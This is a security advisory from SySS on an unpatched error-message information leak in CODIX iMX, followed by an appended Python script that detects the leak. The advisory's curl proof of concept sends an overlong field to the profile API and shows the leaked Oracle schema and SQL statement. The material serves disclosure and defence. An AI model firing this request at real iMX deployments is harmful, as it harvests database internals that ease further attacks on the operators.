-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2026-012
Product: iMX
Manufacturer: CODIX
Affected Version(s): N.A.
Tested Version(s): N.A.
Vulnerability Type: Generation of Error Message Containing Sensitive Information (CWE-209)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2026-02-27
Solution Date: -
Public Disclosure: 2026-04-30
CVE Reference: Not yet assigned
Author of Advisory: Brian Ottmann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

iMX is an enterprise management system covering contracts, receivables,
financing, factoring, credit insurance, loans, leasing, collections,
legal disputes, and more.

The manufacturer describes the product as follows (see [1]):

"iMX is the result of many years of research and development at the
heart of the first European technopolis: Sophia Antipolis, on the French
Riviera, near Nice. iMX is an innovative solution which handles - within
its unique technical environment - 100% of the industry-standard
functions of various service businesses as well as the particular
requirements of each Client."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The personal information update function does not handle database
errors gracefully. Submitting overlong strings or a nonexistent country
code through the profile form under "/ec_ua_personal_info" (the
"language" field of the request shown in the PoC, handled by the API
endpoint /iMX/api/be/personalInfo/updateInfo) causes the application to
return the raw Oracle exception to the client.

The returned message discloses the database product and error
(ORA-12899, SQL state 72000), the schema, table and column involved
("IMXDB"."G_INDIVIDU"."LANGUE") together with that column's maximum
length, the complete UPDATE statement with all column names and
parameter placeholders, and the Java backend in use (java.sql.SQLException
wrapped by a PreparedStatementCallback). An attacker with a valid account
thus learns the database engine, the schema layout and the exact query,
information that eases further attacks on the database layer (CWE-209).
Note that the application already assigns an incidentId to the failed
request, so a handle for server-side correlation exists without exposing
the exception text to the client.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

1. Log in with valid credentials to obtain a valid session.
2. Change personal information inside the profile and submit overlong
   strings or a nonexistent country code inside the request.

Proof with nonexistent country code:

===
curl --path-as-is -s -k [...] \
    --data-binary $'{\"lName\":\"\",\"fName\":\"\",\"language\":\"non-existent\",\"email\":\"SYSS@xx.xx.GS\",\"phone\":\"null1\",\"city\":\"City\",\"postCode\":\"123123\",\"address\":\"\"}' \
    $'https://[customer]/iMX/api/be/personalInfo/updateInfo'

{"status":"BAD_REQUEST","results":null,"incidentId":"7d15[...]de786","messages":["PreparedStatementCallback; uncategorized SQLException for SQL [UPDATE g_individu SET genre = ?, nom = UPPER(trim(?)), prenom = UPPER(trim(?)), adr1 = UPPER(trim(?)), adr2 = UPPER(trim(?)), cp = trim(?), ville = UPPER(trim(?)), pays = ?, siret = trim(?), nomcontact = UPPER(trim(?)), tel1 = trim(?), telecop = trim(?), dtnaiss_dt = ?, moralphy = ?, tel2 = trim(?), telex = trim(?), tel3 = trim(?), email = UPPER(trim(?)), langue = ? WHERE refindividu = ? ]; SQL state [72000]; error code [12899]; ORA-12899: value too large for column \"IMXDB\".\"G_INDIVIDU\".\"LANGUE\" (actual: 6, maximum: 3)\n; nested exception is java.sql.SQLException: ORA-12899: value too large for column \"IMXDB\".\"G_INDIVIDU\".\"LANGUE\" (actual: 6, maximum: 3)\n"]}
===

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

N.A.: no fix was available at the time of publication (see Solution
Status and the Disclosure Timeline below).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2026-02-25: Vulnerability discovered
2026-02-27: Vulnerability reported to manufacturer
2026-03-09: Contacted different contact person
2026-03-27: Contact retry
2026-04-30: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for iMX
    https://www.codix.eu/en/software/about-imx
[2] SySS Security Advisory SYSS-2026-012
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2026-012.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Brian Ottmann of SySS GmbH.
E-Mail: brian.ottmann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Brian_Ottmann.asc
PGP-Fingerprint: CBDF 14A4 83A9 4C31 5861 CF4F 78B4 D7D8 E8E6 65B1

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEy98UpIOpTDFYYc9PeLTX2OjmZbEFAmny/TwACgkQeLTX2Ojm
ZbF1WA//dL1oH/htrTgghJ2EW0aC7kxDZqg+A6KXsM3JcJ2C5Q37vFGOrG7eLuAg
4GfReryUMESyLChORZVEhG0QSA1zQn3o/NEiA5EsVZzX4hbIj+IIdOxPpiiV4Zlj
Kb4AkL6GHcqd5HLXy2tFUpUL5KXtADP6B3W9sBDKBa6Fn4HCwHasl9eoSxiaEuVv
cVRFn3PrD5f3naDRLnlaEc7c1Bl8oa7rqWJDWvTTSIiIJCTdiawfq+8zYHzj23DG
fWgwXHercGuqYzDyfUwPcSPFgNfvrg+KX8ROtxMDXzC3zgVC5wiq9lXRy+1aGK5c
NThMvRoUinRx21EpQS3wnRhijgMID157vz8KNDe6Q/t4RSBi99QMEZ1iQnxyD9n1
dbKP/YfJC6OXklj3a17dDvQ2PKq0yUdRcoLJcd9rvJl1KZlA0MCXWfDmgF5x2Ktx
FymSlJo92bEmnIbNoyP6tcnmh+eOjNgopJDCqXkG9JkAKzIJceH/NjRtyPJmBQ3x
bP+m+59A8mENsZOG1YgiDBI4N6VKVadStC3xhzcgbNztzVIpnLknBoqhjPkCooyq
U76sHYJN3hsbVHVIN6gLRYol0ntV4ZGnZqJC/meOZtXjtosStdd5Qd3igosaPqUt
OFBovACXyxEC5NdQSogRC7+x3X9ybx3xFcAaUicbgFj9t4ecLzM=
=0M09
-----END PGP SIGNATURE-----
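The check a tester would run against an error response like the one in the PoC, as an added example that is not part of the advisory and is neither SySS's nor CODIX's code: it decodes the JSON error body quoted in the PoC (embedded here as a constructed sample), extracts what the message discloses (Oracle error code and SQL state, the full UPDATE statement, the schema, table and column names, the column length limit and the Java exception class), and for contrast builds the shape of a reply that keeps only the incidentId the application already generates, leaving the exception text for the server log. The fingerprints for MySQL, PostgreSQL, MSSQL and PDO go beyond the page so the same check works against other backends; the function names and the wording of the safe reply are assumptions, not the vendor's fix.

```python
"""Detect database error leakage (CWE-209) in an HTTP error body.

Added example for advisory SYSS-2026-012; not SySS's or CODIX's code.
"""
import json
import re

# Constructed sample: the response body quoted in the advisory's PoC
# (incidentId abbreviated with [...] as on the page).
SAMPLE_BODY = json.dumps({
    "status": "BAD_REQUEST",
    "results": None,
    "incidentId": "7d15[...]de786",
    "messages": [
        "PreparedStatementCallback; uncategorized SQLException for SQL "
        "[UPDATE g_individu SET genre = ?, nom = UPPER(trim(?)), "
        "prenom = UPPER(trim(?)), adr1 = UPPER(trim(?)), adr2 = UPPER(trim(?)), "
        "cp = trim(?), ville = UPPER(trim(?)), pays = ?, siret = trim(?), "
        "nomcontact = UPPER(trim(?)), tel1 = trim(?), telecop = trim(?), "
        "dtnaiss_dt = ?, moralphy = ?, tel2 = trim(?), telex = trim(?), "
        "tel3 = trim(?), email = UPPER(trim(?)), langue = ? "
        "WHERE refindividu = ? ]; SQL state [72000]; error code [12899]; "
        'ORA-12899: value too large for column "IMXDB"."G_INDIVIDU"."LANGUE" '
        "(actual: 6, maximum: 3)\n; nested exception is java.sql.SQLException: "
        'ORA-12899: value too large for column "IMXDB"."G_INDIVIDU"."LANGUE" '
        "(actual: 6, maximum: 3)\n"
    ],
})

# Oracle / Spring JDBC details as they appear in the advisory's response.
ORA_CODE = re.compile(r"\bORA-\d{5}\b")
SQL_STATE = re.compile(r"SQL state \[(\w+)\]")
STATEMENT = re.compile(r"for SQL \[(.*?)\]; SQL state", re.S)
SCHEMA_OBJECT = re.compile(r'"([A-Z0-9_]+)"\."([A-Z0-9_]+)"\."([A-Z0-9_]+)"')
COLUMN_LIMIT = re.compile(r"\(actual: (\d+), maximum: (\d+)\)")
EXCEPTION_CLASS = re.compile(
    r"\b(?:java|javax|jakarta|org\.springframework)(?:\.[A-Za-z_]\w*)+")

# Fingerprints of other engines (assumed, beyond the page) so the same
# check generalises to non-Oracle backends.
GENERIC_FINGERPRINTS = {
    "mysql": re.compile(r"You have an error in your SQL syntax"),
    "postgresql": re.compile(r"ERROR:\s+syntax error at or near"),
    "mssql": re.compile(r"Unclosed quotation mark after the character string"),
    "pdo": re.compile(r"SQLSTATE\[\w+\]"),
}


def _strings(obj):
    """Yield every string nested inside a decoded JSON value."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from _strings(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from _strings(value)


def _unique(items):
    """Deduplicate while keeping first-seen order."""
    return list(dict.fromkeys(items))


def response_text(body: str) -> str:
    """Unescape a JSON body (\\" and \\n) so the text reads as the DB wrote it;
    non-JSON bodies are scanned as they are."""
    try:
        return "\n".join(_strings(json.loads(body)))
    except ValueError:
        return body


def extract_leaks(body: str) -> dict:
    """Collect what the error text discloses about the backend."""
    text = response_text(body)
    stmt, state = STATEMENT.search(text), SQL_STATE.search(text)
    return {
        "ora_codes": _unique(ORA_CODE.findall(text)),
        "sql_state": state.group(1) if state else None,
        "statement": stmt.group(1).strip() if stmt else None,
        "objects": _unique(SCHEMA_OBJECT.findall(text)),
        "column_limits": _unique(
            (int(a), int(m)) for a, m in COLUMN_LIMIT.findall(text)),
        "exception_classes": _unique(EXCEPTION_CLASS.findall(text)),
        "generic_fingerprints": [
            name for name, pat in GENERIC_FINGERPRINTS.items() if pat.search(text)],
    }


def is_leaky(body: str) -> bool:
    """True when the body reveals database internals (the CWE-209 condition)."""
    leaks = extract_leaks(body)
    return any(leaks[key] for key in ("ora_codes", "sql_state", "statement",
                                      "objects", "exception_classes",
                                      "generic_fingerprints"))


def safe_error_response(incident_id: str, status: str = "BAD_REQUEST") -> str:
    """Hypothetical safe reply: keep the correlation handle, drop the exception.
    The full exception belongs in the server log, keyed by incident_id."""
    return json.dumps({
        "status": status,
        "results": None,
        "incidentId": incident_id,
        "messages": ["The request could not be processed. "
                     "Please quote the incident ID when contacting support."],
    })


if __name__ == "__main__":
    for key, value in extract_leaks(SAMPLE_BODY).items():
        print(f"{key}: {value}")
    print("leaky:", is_leaky(SAMPLE_BODY))
    print("safe reply:", safe_error_response("7d15[...]de786"))
```

Run it as a script to see the extraction against the advisory's response; in a test harness, feed it the bodies returned by the `curl` request from the PoC. The point of `safe_error_response` is that the application already mints an incidentId for the failed request, so the fix for this class of bug is to log the exception under that ID server-side and return only the ID and a generic message; validating the field lengths and allowed codes before they reach the database removes the trigger itself.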